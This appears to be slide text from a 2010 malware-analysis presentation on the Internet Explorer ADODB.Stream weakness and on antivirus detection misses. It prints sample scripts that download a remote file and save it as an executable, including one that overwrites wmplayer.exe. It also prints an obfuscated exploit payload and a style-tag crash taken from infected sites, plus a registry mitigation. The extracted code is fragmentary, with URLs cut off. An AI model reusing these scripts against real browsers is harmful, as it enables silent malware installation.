Shasta Console Operations February 2010 Tony Caleb

Agenda Dynamic Analysis AV/IS FN Detection MSIE ADODB. Stream Object Installation Weakness

Introduction MSIE ADODB.Stream Object Installation Weakness is the BROWSER EXPLOIT, that allows the hackers to attack a system through browser, install it’s activex controls and takes over the victims system. This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. - SYMANTEC ADODB.stream provides a method for reading and writing files on a hard drive. This by-design functionality is sometimes used by web applications. However, when combined with known security vulnerabilities in Microsoft Internet Explorer, it could allow an internet web site to execute script from the Local Machine Zone (LMZ). This occurs because the ADODB.Stream object allows access to the hard drive when hosted within Internet Explorer. - MICROSOFT This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker- specified file to the victim file system. – SECURITY FOCUS

How does it occurs? Microsoft Internet Explorer is prone to a security weakness that may permit malicious HTML documents to create or overwrite files on a victim file system when interpreted from the Local Zone (or other Security Zones with relaxed security restrictions, such as the Intranet Zone).

What it does in infected machine? This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker- specified file to the victim file system. In this manner, an HTML document that is interpreted in the context of a Security Zone with relaxed security restrictions may install a malicious file on the victim file system. The stream object contains several methods for reading and writing binary files and text files. When this by-design functionality is combined with known security vulnerabilities in Microsoft Internet Explorer, an Internet Web site could execute script from the Local Machine zone. This behavior occurs because the ADODB.Stream object permits access to the hard disk when the ADODB.Stream object is hosted in Internet Explorer The error that displays on the page when the script is been executed ( It makes the user think that just a error has occurred so that the page is not loaded but the malicious content is been downloaded in his system without his knowledge) error.jsp is a jsp page that consists of one line, namely (Just to send a false header in IE)

Sample Code const adTypeBinary = 1 const adSaveCreateOverwrite = 2 const adModeReadWrite = 3 set xmlHTTP = CreateObject("Microsoft.XMLHTTP") xmlHTTP.open "GET"," false xmlHTTP.send contents = xmlHTTP.responseBody Set oStr = CreateObject("ADODB.Stream") oStr.Mode = adModeReadWrite oStr.Type = adTypeBinary oStr.Open oStr.Write(contents) oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite How a file is been downloaded into a victims system

Sample Code var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", " x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; How this exploit can be made in vmplayer

Modification of vmplayer.exe function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media") } window.open("error.jsp","_media"); setTimeout("doit()", 5000); Code for the modification of Windows Media Player

How to Overcome This Issue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{ AA006D2EA4} Changing the keys in the Registry Disabling of ActiveX controls Disabling of any kind of ActiveX controls in the IE security. So that it does not allow anything to download by itself( Anyhow in the older versions of the Internet Explorer it is not possible).

Changing the keys in the Registry 1.Close any open Internet Explorer browser windows. 2.Click Start, and then click Run. 3.In the Open box, type Regedit, and then click OK. 4.In Registry Editor, locate the following registry key: 5.“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility” 6.Right-click ActiveX Compatibility, point to New, and then click Key. 7.Type the following name for the key: 8.{ AA006D2EA4} 9.Close Registry Editor.

Samples of FN Detection MSIE Event Object Mem Corruption Code Exec HTTP MSIE Style Tag Cmt Mem Corruption The domain “khan.co.kr” with URL is found to have the above threat but during the manual analysis of this URL NIS does not detect it. Here the hackers have bypassed the AV/IS. This is a common FN that we find in with IS. Here a script that redirects to malicious links will be given in the encoded format and since the redirect link is not active NIS but it will change dynamically. This clearly proves that the malicious content is intentionally done since the script tag is present after the close html tag. Trojan.Malscript.B The domain Voy.com with the URL is found to have the above threat but during the manual analysis of this URL and the AV/IS fail to detect.

MSIE Event Object Mem Corruption Code Exec

Code in the index2.html eval(function(p,a,c,k,e,d){e=function(c){return(c 35?String.fromCharCo de(c+29):c.toString (36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function() {return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g a=1b;g 2="%u";g 1B="%2E%w%2t%c%2w"+2+"b";g 10="%P%34%h%39"+2+"6";g 1l="%C%B%A%h%36";g 1C="%2Y%2Q%2P%2T%1P%1W";g s=a("%1O%1L"+2+"6%M%1H%1F% K%1E%1K"+2+"6%1a%1N%2m%2a%S%4b"+2+"b%4a");s+=a("%q%N%y%49"+2+"6%41%f%k%4w" +2+"6%4r%q%N%y%4s"+2+"6%3s%f%k");s+=a("% 3w"+2+"6%3V%q%N%y%1y"+2+"6%3E%f%k%3I"+2+"6%3H%1s%17%3G%M%16");s+=a("%19%1e %r%k%4c"+2+"6%R%1s%17%3J%M%16%19%3A%r%k% 3B"+2+"6%R");s+=a("%3C%3D"+2+"6%1a%3L%3S%3T%3U%3R%3Q%3M%3N%3O%3P%3z%3y% 3i%3j%3k"+"F"+"0"+"5");s+=a("%3l%3h%3g%3c%3d% 3e"+2+"6%3f%X%3m%1c%J%L%3n%15%3u");s+=a("%L%3v%1c%J%L%3t%15%3o%3p%W%P%3q %f%3r%14%1e%q");s+=a("%k%3X"+2+"6%Q%4t%4u%4v%4q% 4m%4n%4o%4p%X%4x%4E%4F%4G");s+=a("%4D%4C%W%12%1z%4y%4z%4A%4B%4l%4k%44 %1z%46%47%43%42");s+=a("%3Y%3Z"+2+"6%40%14%P"+10+"% 4g"+2+"6%4h%4i"+2+"6%4j");s+=a("%4f"+2+"b%m%4e"+2+"6%12%11%11%l%3b%4d%4H%2U%27 %28%29%u"+"4"+"1"+"9"+"0");s+=a("%26%25%21% 22%23%24%2b"+2+"b%c%2c"+2+"b%2j%2k%2l%1y%2i"+2+"b");s+=a("%18%1f%1r%2h"+2+"6%h%2 d"+2+"6%l%1q%1t%1u%1x%2e"+2+"6%1w%

MSIE Event Object Mem Corruption Code Exec Code in the index2.html 1v");s+=a("%S%2f"+2+"6%20"+2+"6%K%S%1V"+2+"b%1G%1J%1f%1r%1M"+2+"6%h%1I");s+=a(""+ 2+"6%l%1q%1t%1u%1x%1Z"+2+"6%1w%1v%1X%1Y% 1U%1T%R%1Q"+2+"b");s+=a("%1R%1S%2g%Q%3a%2o%2V%2W%2X"+2+"6%l%Q%2S%2O%U% 2R%2Z");s+=a("%37%38"+2+"6%35%30%31%32%33%2N%2M%r%K% 2x%y%2y"+2+"6%l");s+=a("%2z%2v%1d%w%J%2u%2q%2p%2r%2s"+2+"6%l%z%2A%2B%f"+2+"6") ;s+=a("%2I%2J"+2+"6%2K%2L%2H%1n%w%1k%2G%v% 1j%2C%r%1g%2D"+2+"b");s+=a("%1h"+2+"b%1i%d%2F%45%5k%76"+1l+""+2+"b%h%75"+2+"6");s+ =a("%4I%v%m%E"+2+"b%z%I%78%79%U%74%73%C% B%A%h%6Z");s+=a(""+2+"b%h%6Y"+2+"6%70%v%m%E"+2+"b%z%I%71%72%U%7b%7j%C");s+=a ("%B%A%h%7m"+2+"b%h%7i"+2+"6%7h%v%m%E"+2+"b%z% I%7g%6X");s+=a("%6W%1n%w%1k%6E%6D%1j%6F%f%1g%6G"+2+"b%1h"+2+"b%1i%6H%c");s+= a("%6C"+2+"6%6B%6x%6w%6y%f%e%d%c%6z"+2+"6%6A% 6I%6J%6S%f");s+=a("%e%d%c%6R"+2+"6%6T%6U%6V%6Q%f%e%d%c%6P"+2+"6%6L%6K");s+= a("%6M%7o%f%e%d%c%6N"+2+"6%6O%7n%7x%86%f%e%d%c% 7R");s+=a(""+2+"b%7Q%87%7W%7X%f%e%d%c%7Y"+2+"6%7Z%7V%7U%7P%f%e");s+=a("%d%c %7S"+2+"6%7T%80%81%88%f%e%d%c%82"+2+"b%83%84% 85");s+=a("%7N%f%e%d%c%7w"+2+"b%7O%7y%Z%7z%f%e%d%c%7v"+2+"6");s+=a("%7u%7q%7p %7r"+2+"6%e%d%c%7s"+2+"6%7t%7A%7B%7J"+2+"6%e%

HTTP MSIE Style Tag Cmt Mem Corruption The /* is closed after the end of style tag that is after 80,000 lines of garbage stuff. Due to insertion of these unwanted stuff, the memory stack is overflow and as a result the entire browser crashes. body{background-repeat:repeat;background- color:black;background-image:none;color:black;visibility:hidden;font-size:10000;line- height:10000;letter-spacing:10000;text-decoration:blink;text-align:right;margin- top:10000;}form{visibility:hidden;}table{visibility:hidden;}a{visibility:hidden;}img{visibility:hidden;}input{vi URL : hxxp://

Manual Analysis How we do the manual analysis Tools we use for manual analysis Samples

Tools Used for Manual Analysis HTTP Analyzer TCP Viewer Process Explorer Systracer (System Tracer) Start up programs ( msconfig,services.msc)

HTTP Malicious Toolkit Variant Activity From URL: function bfbn15(p){ var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,1 4,41,59,1,51,47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,44,36,22,5,7,3 5,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12);for(i=Math.ceil(h/k);i>0;i-- ){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)- 48]) >=8;d- UrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl') After Decoding function bfbn15(p) Zki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl')

HTTP Malicious Toolkit Variant Activity

Thank You